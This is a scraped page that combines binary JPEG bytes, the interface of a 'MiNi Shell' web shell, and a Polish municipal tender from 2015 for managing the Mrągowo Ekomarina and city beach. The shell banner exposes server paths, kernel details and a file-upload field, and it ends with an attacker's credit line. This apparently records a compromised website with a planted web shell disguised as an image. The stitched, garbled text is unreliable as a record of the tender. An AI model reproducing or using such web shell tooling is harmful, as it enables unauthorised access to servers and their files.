JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/333356-N-2015.html

<p class="kh_header"><b>Mrągowo: Zarządzanie Ekomariną w skład  której wchodzi Centrum Edukacji Ekologicznej oraz terenami rekreacyjnymi łącznie z plażą miejską i infrastrukturą towarzyszącą</b><br>
<b>Numer ogłoszenia: 333356 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mrągowo , ul. Królewiecka 60A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 89 74190 00, faks 89 7412874.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie Ekomariną w skład  której wchodzi Centrum Edukacji Ekologicznej oraz terenami rekreacyjnymi łącznie z plażą miejską i infrastrukturą towarzyszącą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowe zarządzanie Ekomariną w skład  której wchodzi Centrum Edukacji Ekologicznej oraz terenami rekreacyjnymi łącznie z plażą miejską i infrastrukturą towarzyszącą. 
2.	Zamawiający powierzy Operatorowi zarządzanie nieruchomością położoną przy ul. Jaszczurcza Góra w Mrągowie, składającą się z działki o numerze 5-256/4 na której znajduje się Ekomarina i tereny rekreacyjne wraz z plażą miejską i infrastrukturą towarzyszącą oraz część działki o numerze 5-250 na której zlokalizowane są miejsca parkingowe wchodzące w skład Ekomariny.
Zadania Operatora
I.	Operator przyjmuje do wykonania kompleksowe zarządzanie Ekomariną i terenami rekreacyjnymi łącznie z plażą miejską i infrastrukturą towarzyszącą, w zakresie uprawnień i obowiązków wynikających z przepisów ustawy o gospodarce nieruchomościami, a także odrębnych bezwzględnie obowiązujących przepisów prawa.  
II.	Do obowiązków Operatora w zakresie zarządzania Ekomariną oraz Centrum Edukacji Ekologicznej należy:       
1.	utrzymanie (bieżące administrowanie) obiektów Ekomariny w tym Centrum Edukacji Ekologicznej w stanie nie pogorszonym,
2.	prowadzenie działalności zgodnej z przeznaczeniem nieruchomości, 
3.	sprawowanie nadzoru i zapewnienie ochrony nad nieruchomością również poza sezonem tj. od 15.10 do 15.04,  
4.	zapewnienie bezpieczeństwa użytkowania, 
5.	zapewnienie właściwej eksploatacji i obsługi  technicznej w tym:
a) prowadzenie ksiąg i wymaganych prawem dokumentacji dotyczących obiektów budowlanych, 
b) konserwację i remonty bieżące obiektów znajdujących się na terenie nieruchomości przez autoryzowane firmy serwisowe lub pracowników posiadających odpowiednie uprawnienia (w tym odmulanie slipu),
c) przygotowanie i przeprowadzanie (lub nadzór nad zaangażowanymi podmiotami) wszelkich przeglądów serwisowych oraz napraw, 
d) prowadzenie przeglądów technicznych wymaganych przepisami Prawa budowlanego i wykonywanie zaleceń z nich wynikających,
e) zapewnienie i utrzymywanie dostaw mediów do nieruchomości,
f) bieżące prowadzenie strony internetowej dotyczącej Ekomariny w tym Centrum Edukacji Ekologicznej oraz terenów towarzyszących,
g) zgłaszanie Zamawiającemu wszelkich wad podlegających naprawom gwarancyjnym,
h) przestrzeganie przepisów ustawy o utrzymaniu czystości i porządku w gminach a także innych aktów prawa, niezbędnych do rzetelnego racjonalnego wykonywania przedmiotu umowy, 
i) utrzymanie zieleni  w tym zieleni wysokiej oraz sprzątanie zimowe i letnie,
6.	organizowanie imprez, określonych w regulaminie organizacyjnym Centrum Edukacji Ekologicznej, a także z wykorzystaniem obiektów Ekomariny (bosmanat, budynek toalet, parkingi, slip, pomost do cumowania) z wyłączeniem usług gastronomicznych na obiektach należących do Ekomariny, z których przychody powinny pokrywać koszty utrzymania Ekomariny,

7.	zapewnienie właściwej gospodarki ekonomiczno - finansowej, w tym prowadzenie odrębnej ewidencji księgowej dla dokumentowania osiągniętych przychodów i ponoszonych kosztów, dotyczących realizowanych przedsięwzięć na majątku Ekomariny, co podyktowane jest warunkami uzyskanego dofinansowania ze środków Unii Europejskiej. Zgodnie z warunkami dofinansowania Ekomarina nie może generować dochodów,
8.	zapewnienie osiągnięcia i monitorowania wskaźników projektu określonych we wniosku o dofinansowanie ze środków Unii Europejskiej:
a)	osiągnięcie wskaźnika dot. objęcia ochroną i innymi środkami ochrony  min. 14127 osób  w ciągu każdego roku obowiązywania umowy - na podstawie prowadzonego  rejestru korzystających z wypożyczalni sprzętu pływającego, rejestru rejsów Klubu Żeglarskiego Baza Mrągowo (uzyskanego od Klubu),oraz rejestru prowadzonego przez WOPR,
b)	osiągnięcie wskaźnika dot. objęcia min. 70471 osób selektywną zbiórką odpadów korzystających z obiektu w ciągu każdego roku obowiązywania umowy - na podstawie umowy na wywóz odpadów zmieszanych oraz selektywnie zbieranych co odpowiada wywiezieniu 11 kontenerów odpadów w ciągu roku oraz wykazanie się kartami przekazania odpadów z selektywnej zbiórki, 
c)	osiągnięcie wskaźnika dot. utworzenia 3 nowych miejsc pracy - na podstawie umowy o pracę. Miejsca pracy muszą być utrzymane przez okres min. 2 lat od ich utworzenia,
9.	zachowanie trwałości projektu Ekomariny, tzn. nie poddawania go znaczącym modyfikacjom, mającym wpływ na jego charakter i funkcję,
10.	sprawowanie nadzoru nad oznakowaniem znakami unijnymi wyposażenia znajdującego się w budynku Bosmanatu w którym znajduje się Centrum Edukacji Ekologicznej, a w przypadku uszkodzenia (odklejenia, zerwania, zniszczenia) naprawienia szkody na własny koszt,
11.	informowanie Zamawiającego o wszelkich uszkodzeniach tablic informujących o wsparciu środkami Unii Europejskiej,
12.	 w okresie miesiąca od rozpoczęcia sezonu turystycznego, który trwa od 15.04 do 15.10 Operator uzgodni z przedstawicielem Zamawiającego i przeprowadzi kompleksowe czynności przygotowujące nieruchomość do planowanego funkcjonowania oraz eksploatacji, w szczególności takie jak:
a) opracuje program w zakresie planowanych działań sportowych , rekreacyjnych na  terenie Ekomariny  (min. 5 imprez w sezonie)
b) opracuje program działania Centrum Edukacji Ekologicznej z wykorzystaniem przekazanego wyposażenia w tym przygotuje ekspozycję  akwarystyczną dotyczącą ryb słodkowodnych,
c) umieści  na stronie internetowej Ekomariny informacje dotyczące programów wymienionych w pkt a i b 
d) zapewni wykwalifikowaną kadrę techniczną i zarządzającą nieruchomością, 
e) opracuje zasady(regulaminy) udostępniania Ekomariny.
           13.  Udostępnianie odpłatne toalet oraz pomieszczeń sanitarnych w sezonie 15.04.-15.10. oraz   
                 wyposażenie nieruchomości w przenośne toalety w-c (min. 2 szt.) poza sezonem wraz z 
                 serwisowaniem. Przychody z działalności nie podlegają rozliczeniu.
III.	Do obowiązków Operatora w zakresie zarządzania terenami rekreacyjnymi łącznie z plażą miejską i infrastrukturą towarzyszącą, należy: 
1)	utrzymanie obiektów budowlanych, urządzeń oraz urządzonego terenu w stanie nie pogorszonym,
2)	prowadzenie działalności zgodnej z przeznaczeniem nieruchomości,
3)	sprawowanie nadzoru, utrzymanie obiektu w czystości i zapewnienie ochrony w nieruchomości w sezonie oraz poza sezonem tj. od 15.10 do 15.04,
4)	zapewnienie bezpieczeństwa użytkowania obiektu w okresie umowy,
5)	zapewnienie właściwej eksploatacji i obsługi  technicznej w tym:
    a) założenie wymaganych prawem oraz prowadzenie przekazanych ksiąg i dokumentacji dotyczących obiektów budowlanych, 
    b) utrzymanie czystości i porządku w tym utrzymanie zimowe, konserwacja zieleni w tym zieleni wysokiej, konserwacja i remonty bieżące obiektów i urządzeń znajdujących się na terenie nieruchomości przez autoryzowane firmy serwisowe lub pracowników posiadających odpowiednie uprawnienia,
    c) przygotowywanie i przeprowadzanie (lub nadzór nad zaangażowanymi podmiotami) wszelkich przeglądów serwisowych oraz napraw, 
   d) prowadzenie przeglądów technicznych wymaganych przepisami Prawa budowlanego i wykonywanie zaleceń z nich wynikających,
    e) zgłaszanie Zamawiającemu wszelkich wad podlegających naprawom gwarancyjnym,
    f) wykonywanie obowiązków wynikających z przepisów ustawy o utrzymaniu czystości i porządku w gminach a także innych aktów prawa, niezbędnych do rzetelnego i racjonalnego wykonywania przedmiotu umowy, 
    g) zaopatrzenie obiektu w regulaminy, informacje, oznakowanie właściwe dla tego rodzaju obiektu,
              6)  organizowanie imprez sportowych, rekreacyjnych i innych wynikających z funkcji            
                   nieruchomości własnym staraniem i na koszt własny, z których przychody powinny  
                   pokrywać koszty utrzymania,
7)	złożenie Zamawiającemu programu działalności na rok bieżący oraz sprawozdania z 
     działalności za rok ubiegły w terminie do 30 marca,
8)	zachowanie trwałości obiektu tzn. nie poddawanie go znaczącym modyfikacjom, 
     mającym wpływ na jego charakter i funkcję,
9)	współpraca z organami ścigania oraz ubezpieczycielem  w zakresie zniszczeń i dewastacji 
majątku, powierzonego do zarządzania na warunkach ustalonych w umowie ubezpieczenia majątku, zawartej z Zamawiającym.
     10). zorganizowanie, urządzenie i prowadzenie miejsca wykorzystywanego do kąpieli w 
           wymaganym  sezonie kąpielowym od 15.06.do 30.09. każdego roku
IV. Operator będzie kompleksowo oraz zgodnie z przeznaczeniem zarządzał Ekomariną (w tym Centrum Edukacji Ekologicznej, parkingami, placem zabaw dla najmłodszych oraz infrastrukturą towarzyszącą, w zakresie dotyczącym spraw technicznych, eksploatacyjnych oraz komercyjnych, w tym organizacji imprez.
V. Na podstawie umowy Operator nie nabywa od Zamawiającego własności ani innych praw do jakichkolwiek rzeczy.
VI. Operator ma prawo do dodatkowej aranżacji pomieszczeń znajdujących się w obiektach budowlanych nieruchomości w takim zakresie, w jakim uzna za niezbędne w celu prawidłowego i zgodnego z przeznaczeniem funkcjonowania obiektów budowlanych. Wszelkie koszty w tym zakresie ponosi Operator.
VII. W okresie wykonywania umowy Zamawiający ma zagwarantowane prawo wstępu, bez ograniczeń, na teren nieruchomości wyznaczonych przez niego przedstawicieli, w celu zbadania i sprawdzenia stanu wywiązywania się przez Operatora z zawartej między stronami umowy. Zamawiający jest uprawniony do zgłaszania uzasadnionych uwag oraz rekomendacji w zakresie utrzymania i eksploatacji nieruchomości.  
VIII. Operator nie ma prawa dokonywać żadnych prac budowlanych polegających na przebudowie, ulepszeniu lub modernizacji nieruchomości bez pisemnej zgody Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9, 70.33.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
2. Licencji zawodowego zarządcy nieruchomości
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Kryterium społeczne - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.
2. Wszelkie zmiany umowy nie mogą uchybiać treści art. 144 ust. 1 ustawy Prawo zamówień publicznych.
3. Strony uzgadniają, że niniejsza umowa może zostać zmieniona przez Strony w przypadku, gdy wykonywanie umowy lub poszczególnych obowiązków Stron będzie niemożliwe lub znacznie utrudnione wskutek wystąpienia siły wyższej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/mragowo_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 10:30, miejsce: Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com